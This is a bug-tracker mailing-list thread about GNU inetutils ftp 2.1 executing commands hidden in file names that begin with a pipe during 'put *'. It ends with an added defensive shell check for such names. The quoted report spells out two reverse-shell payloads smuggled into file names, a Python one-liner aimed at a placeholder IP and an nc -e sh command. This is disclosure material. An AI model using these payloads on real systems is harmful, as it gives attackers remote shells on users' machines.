bug-inetutils

Re: FTP client arbitrary code execution


From: Simon Josefsson
Subject: Re: FTP client arbitrary code execution
Date: Mon, 20 Sep 2021 13:52:06 +0200
User-agent: Gnus/5.13 (Gnus v5.13) Emacs/27.1 (gnu/linux)

John Zhau <johnzhau0xnull@gmail.com> writes:

> After some further testing, I've found that I'm still able to get a shell
> with the aforementioned payload even with other files in the same
> directory. I've also found that I can also get a shell with the following
> file name:
>
> ```
> |nc 127.0.0.1 1337 -e sh
> ```
>
> As a result, I believe code execution is caused by having a `|` (pipe) at
> the beginning of the file name.

Hi.  Thanks for the report.  Are you sure this isn't intended behaviour?
There seems to be globbing support in the ftp client, to support
redirects like | and > from within the client.

/Simon

>
> Also, the version information is as follows.
>
> ```
> $ ftp --version
> ftp (GNU inetutils) 2.1
> Copyright (C) 2021 Free Software Foundation, Inc.
> License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>.
> This is free software: you are free to change and redistribute it.
> There is NO WARRANTY, to the extent permitted by law.
>
> Written by many authors.
> ```
>
> On Sun, Sep 19, 2021 at 7:04 PM John Zhau <johnzhau0xnull@gmail.com> wrote:
>
>> I've found that with a certain file name, `ftp` executes code in the file
>> name. The file is created with the following command
>>
>> ```
>> touch "|python3 -c 'import
>> os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",YOUR_PORT));[os.dup2(s.fileno(),f)for
>> f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"
>> ```
>>
>> To get code to execute, simply have the file in the current directory
>> (haven't tested with multiple files in the directory) and run `put *` to
>> upload everything.
>>
>> This bug was found while I was doing a CTF (capture the flag) challenge
>> and I haven't been able to connect to the same server since for further
>> testing.
>>
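
Added example, not part of the original thread and not GNU inetutils code: a pre-upload check in shell that lists the entries of a directory whose names begin with `|`, the condition the report above identifies, so they can be renamed or excluded before running `put *`. The function name `find_pipe_names` and the sample file names are constructed for illustration.

```shell
#!/bin/sh
# find_pipe_names DIR
# Prints every entry of DIR whose name starts with '|' (one per line) and
# returns 1 if at least one was found, 0 otherwise.
find_pipe_names() {
    dir=${1:-.}
    found=0
    # Use a glob instead of parsing `ls`, so spaces and quotes in names survive.
    for path in "$dir"/*; do
        # An unmatched glob stays literal; skip it (but keep dangling symlinks).
        [ -e "$path" ] || [ -L "$path" ] || continue
        name=${path##*/}
        case $name in
            '|'*)
                printf '%s\n' "$name"
                found=1
                ;;
        esac
    done
    return "$found"
}

# Demonstration on constructed sample names in a throwaway directory.
demo=$(mktemp -d)
: > "$demo/report.csv"
: > "$demo/|echo constructed-sample"
if find_pipe_names "$demo" >/dev/null; then
    echo "no pipe-prefixed names; directory is safe to upload with a glob"
else
    echo "pipe-prefixed names found; rename or exclude them before 'put *':"
    find_pipe_names "$demo" || true
fi
rm -rf "$demo"
```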
